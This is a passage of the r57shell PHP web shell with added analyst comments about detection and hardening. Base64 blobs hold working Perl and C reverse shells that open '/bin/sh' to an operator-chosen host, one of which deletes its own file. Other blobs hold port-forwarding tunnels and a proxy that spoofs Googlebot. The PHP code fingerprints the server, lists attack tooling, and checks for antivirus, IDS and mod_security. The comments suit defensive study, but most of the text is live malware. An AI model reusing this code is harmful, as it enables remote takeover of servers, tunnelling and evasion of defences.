3808aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
3809
3810hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
3811
3812sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
3813
3814kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
3815
3816KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
3817
3818OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
3819
3820$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
3821
3822BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
3823
3824SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
3825
3826KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
3827
3828sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
3829
3830Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
3831
3832QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
3833
3834Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
3835
3836$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
3837
3838x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
3839
3840HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
3841
3842aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
3843
3844lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
3845
3846xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
3847
3848W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
3849
3850LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
3851
3852udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
3853
38540KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
3855
3856iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
3857
3858KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
3859
3860gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
3861
3862hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
3863
3864iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
3865
3866ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
3867
3868vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
3869
3870AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
3871
3872QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
3873
3874ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
3875
3876gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
3877
3878wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
3879
388029jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
3881
3882MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
3883
3884gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
3885
38865zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
3887
3888HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
3889
3890dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
3891
3892KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
3893
3894ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
3895
3896E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
3897
3898Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
3899
3900NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
3901
3902J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
3903
3904CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
3905
3906dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
3907
3908gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
3909
3910lsZSk7DQogIHJldHVybiAwOw0KfQ==";
3911
3912$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
3913
3914CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
3915
3916bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
3917
3918gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
3919
3920NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
3921
3922iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
3923
3924aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
3925
3926SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
3927
3928xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
3929
3930WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
3931
3932CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
3933
3934yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
3935
3936I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
3937
3938m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
3939
3940IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
3941
3942lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
3943
3944QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
3945
3946CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
3947
3948c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
3949
3950NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
3951
3952UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
3953
3954DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
3955
3956ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
3957
39581ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
3959
3960$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
3961
3962luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
3963
39640NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
3965
3966UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
3967
3968DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
3969
3970AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
3971
3972GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
3973
3974cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
3975
3976BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
3977
3978AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
3979
3980TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
3981
3982eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
3983
3984oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
3985
3986VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
3987
3988CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
3989
3990b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
3991
39920ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
3993
39949wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
3995
3996CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
3997
3998aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
3999
4000gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
4001
40029yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
4003
// Analyst note: host fingerprinting (Unix branch of this r57shell variant).
// Runs `uname -a`, `id` and two `sysctl -n` queries through ex() and caches each result in a
// cookie named `uname`, `id` or `sysctl`, so later requests reuse the cached value.
// ex() is defined outside this excerpt; from its use here it presumably runs a shell command
// and returns the output.
// Detection: the web-server account spawning `uname`, `id` or `sysctl`, and HTTP traffic to a
// PHP file carrying cookies with those names whose values look like command output.
// Once the cookies exist the values come from $_COOKIE unvalidated, so they are client-controlled.
4004if($unix)
4005
4006 {
4007
4008 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
4009
4010 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
4011
4012 if($safe_mode) { $sysctl = '-'; }
4013
4014 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
4015
4016 else
4017
4018 {
4019
 // Tries the kern.* key names first, then the kernel.* names; '-' is stored when neither returns output.
4020 $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
4021
4022 if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
4023
4024 if(empty($sysctl)) { $sysctl = '-'; }
4025
4026 setcookie('sysctl',$sysctl);
4027
4028 }
4029
4030 }
4031
4032
4033
// Analyst note: inventory of tooling the operator could use on this host.
// When the cookie named by $lang[$language.'_text137'] is absent, which() is called for every
// entry of $userful (compilers, interpreters, archive tools, nc, ...; the list is defined at
// the top of the file), then Apache modules, pcntl_exec and several PHP extensions are probed.
// The joined result is cached in that cookie and reused on later requests.
// which() is defined outside this excerpt; presumably it resolves a binary name to a path.
// Hardening takeaway: the check looks for compilers and network utilities reachable by the
// web-server account; removing them or denying exec to that account empties this list.
4034if(!isset($_COOKIE[$lang[$language.'_text137']])) {
4035
4036 $ust_u='';
4037
4038 if($unix && !$safe_mode){
4039
4040 foreach ($userful as $item) {
4041
4042 if(which($item)){$ust_u.=$item;}
4043
4044 }
4045
4046 }
4047
 // Server-side features that allow code to run outside the PHP sandbox settings probed above.
4048 if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
4049
4050 if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
4051
4052 if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
4053
4054 if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
4055
4056 if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
4057
4058 if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
4059
4060 if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
4061
 // List entries carry a leading ", " separator; this blanks the first comma before trimming.
4062 if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
4063
4064
4065
4066 $ust_u = trim($ust_u);
4067
4068 setcookie($lang[$language.'_text137'],$ust_u);
4069
4070}else {
4071
4072 $ust_u = trim($_COOKIE[$lang[$language.'_text137']]);
4073
4074}
4075
4076
4077
// Analyst note: enumeration of defensive software on the host.
// $danger (defined at the top of the file) names antivirus daemons, rootkit checkers, firewalls,
// IDS and log-monitoring tools. Each name is looked up with which() and again with ps(); both
// helpers are defined outside this excerpt (presumably a PATH lookup and a process-list search).
// mod_security is checked through apache_get_modules(). The result is cached in the cookie
// named by $lang[$language.'_text138'].
// Detection: a burst of lookups for security-product names issued by the web-server account
// is high-signal telemetry, since legitimate web applications have no reason to do this.
4078if(!isset($_COOKIE[$lang[$language.'_text138']])) {
4079
4080 $ust_d='';
4081
4082 if($unix && !$safe_mode){
4083
4084 foreach ($danger as $item) {
4085
4086 if(which($item)){$ust_d.=$item;}
4087
4088 }
4089
4090 }
4091
 // Second pass over the same list; an item found by both which() and ps() is appended twice.
4092 if(!$safe_mode){
4093
4094 foreach ($danger as $item) {
4095
4096 if(ps($item)){$ust_d.=$item;}
4097
4098 }
4099
4100 }
4101
4102 if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";}
4103
4104 if(substr($ust_d,0,1)==",") {$ust_d[0]="";}
4105
4106
4107
4108 $ust_d = trim($ust_d);
4109
4110 setcookie($lang[$language.'_text138'],$ust_d);
4111
4112}else {
4113
4114 $ust_d = trim($_COOKIE[$lang[$language.'_text138']]);
4115
4116}
4117
4118
4119
// Analyst note: enumeration of ways to pull a remote file onto the host.
// Offers "fopen" when allow_url_fopen is enabled (or ini_get is unavailable), then adds every
// entry of $downloaders (wget, fetch, lynx, links, curl, get; defined at the top of the file)
// that which() finds.
// The guard tests the cookie named by $lang[$language.'_text142'], but the values are stored
// under the fixed names `select_downloaders` and `downloader`. Unless that label resolves to
// one of those names (not visible here), the enumeration repeats on every request.
// Detection: a Set-Cookie header named `select_downloaders` whose value is HTML `<select>`
// markup is distinctive for this family.
// Mitigation: disable allow_url_fopen and restrict outbound connections from the web tier.
4120if(!isset($_COOKIE[$lang[$language.'_text142']])) {
4121
4122
4123
4124 $select_downloaders='<select size="1" name=with>';
4125
4126 if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
4127
4128 if($unix && !$safe_mode){
4129
4130 foreach ($downloaders as $item) {
4131
4132 if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";}
4133
4134 }
4135
4136 }
4137
4138 $select_downloaders .= '</select>';
4139
4140 if(substr($downloader,0,1)==",") {$downloader[0]="";}
4141
4142
4143
4144 $downloader=trim($downloader);
4145
4146 setcookie('select_downloaders',$select_downloaders);
4147
4148 setcookie('downloader',$downloader);
4149
4150}else {
4151
 // Both values are taken from the client as-is; $select_downloaders is HTML supplied by the cookie.
4152 $select_downloaders = $_COOKIE['select_downloaders'];
4153
4154 $downloader = trim($_COOKIE['downloader']);
4155
4156}
4157
4158
4159
4160
4161
// Analyst note: page banner. The literal strings emitted here ("r57shell", "Edited By
// KingDefacer", the `v.`+$version tag) are stable content signatures for file scanners and for
// matching HTTP response bodies. They identify this particular edit of the shell; a renamed or
// re-skinned copy will not carry them.
// The banner also reflects REMOTE_ADDR, the X-Forwarded-For and Client-IP request headers and
// the Host header back to the viewer without escaping, and calls gethostbyname() on Host,
// which triggers a DNS lookup for a client-supplied name.
4162echo $head;
4163
4164echo '</head>';
4165
4166
4167
4168echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=100><font face=Verdana size=2>'.
4169
4170ws(2).'<b>'.ws(2).'<center>r57shell<br>v.'.$version.'</b><br><p><b><font color="#FF0000" size="2">Edited By KingDefacer</font></b></p></center></font>'.
4171
4172$fs.'<font face=Verdana size=-2><center>'.$lang[$language.'_text143']."<b>".$tempdir."</b><br>".$select_tempdir.'<br>'.in('submit','submit',0,$lang[$language.'_butt6']).
4173
4174'</center></font>'.$fe.'</td>'.'<td bgcolor=#cccccc><font face=Verdana size=-2>';
4175
4176echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
4177
4178echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
4179
4180echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
4181
4182echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";
4183
4184
4185
